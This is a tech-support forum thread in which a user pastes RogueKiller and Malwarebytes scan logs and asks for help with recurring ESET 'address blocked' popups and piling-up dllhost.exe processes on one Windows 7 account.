  10. RogueKiller V10.0.4.0 (x64) [Oct 29 2014] by Adlice Software mail : http://www.adlice.com/contact/ Feedback : http://forum.adlice.com Website : http://www.adlice.com/softwares/roguekiller/ Blog : http://www.adlice.com Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version Started in : Normal mode User : bcostello [Administrator] Mode : Scan -- Date : 11/04/2014 09:28:46 ¤¤¤ Processes : 0 ¤¤¤ ¤¤¤ Registry : 16 ¤¤¤ [PUM.HomePage] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome -> Found [PUM.HomePage] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome -> Found [PUM.HomePage] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome -> Found [PUM.HomePage] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome -> Found [PUM.SearchPage] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> Found [PUM.SearchPage] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> Found [PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-1619941995-4271792153-444280415-3256\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> Found [PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-1619941995-4271792153-444280415-3256\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> Found [PUM.SearchPage] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> Found [PUM.SearchPage] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch -> Found [PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-1619941995-4271792153-444280415-3256\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> Found [PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-1619941995-4271792153-444280415-3256\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> Found [PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1 -> Found [PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1 -> Found [PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1 -> Found [PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1 -> Found ¤¤¤ Tasks : 0 ¤¤¤ ¤¤¤ Files : 0 ¤¤¤ ¤¤¤ Hosts File : 1 ¤¤¤ [C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 localhost ¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤ ¤¤¤ Web browsers : 0 ¤¤¤ ¤¤¤ MBR Check : ¤¤¤ +++++ PhysicalDrive0: SAMSUNG SSD PM830 2.5" 7 +++++ --- User --- [MBR] 4ae5c1f7864edd27dcfcf30b3307905a [bSP] 2ca67ac4e906422a9807f6f81177dd53 : HP MBR Code Partition table: 0 - [XXXXXX] DELL-UTIL (0xde) [VISIBLE] Offset (sectors): 63 | Size: 39 MB 1 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 81920 | Size: 752 MB 2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 1622016 | Size: 121308 MB User = LL1 ... OK User = LL2 ... OK
  11. Malwarebytes Anti-Malware www.malwarebytes.org Scan Date: 11/4/2014 Scan Time: 9:12:58 AM Logfile: mbamreport.txt Administrator: Yes Version: 2.00.3.1025 Malware Database: v2014.11.04.03 Rootkit Database: v2014.11.01.02 License: Free Malware Protection: Disabled Malicious Website Protection: Disabled Self-protection: Disabled OS: Windows 7 Service Pack 1 CPU: x64 File System: NTFS User: bcostello Scan Type: Threat Scan Result: Completed Objects Scanned: 550808 Time Elapsed: 5 min, 30 sec Memory: Enabled Startup: Enabled Filesystem: Enabled Archives: Enabled Rootkits: Disabled Heuristics: Enabled PUP: Enabled PUM: Enabled Processes: 0 (No malicious items detected) Modules: 0 (No malicious items detected) Registry Keys: 0 (No malicious items detected) Registry Values: 0 (No malicious items detected) Registry Data: 2 PUM.Disabled.SecurityCenter, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER|UpdatesDisableNotify, 1, Good: (0), Bad: (1),Replaced,[834078bfe99346f0ba29c470d431f60a] PUM.Hijack.ConnectionControl, HKU\S-1-5-21-1619941995-4271792153-444280415-1167-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\POLICIES\MICROSOFT\INTERNET EXPLORER\CONTROL PANEL|ConnectionsTab, 1, Good: (0), Bad: (1),Replaced,[80438fa83349c670e404e0546a9b25db] Folders: 0 (No malicious items detected) Files: 0 (No malicious items detected) Physical Sectors: 0 (No malicious items detected) (end)
  12. For a couple of weeks, one of our users has had non-stop ESET popups informing him that "an address has been blocked." As this is happening, many dllhost.exe *32 COM Surrogate processes build up in the task manager. This problem is only present on his user account on the computer. I deleted his user profile and had him log in again. The problem cleared for almost a week before it came back. Any help ridding this computer of it would be greatly appreciated. I've run a FRST scan and attached the logs. FRST.txt Addition.txt
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.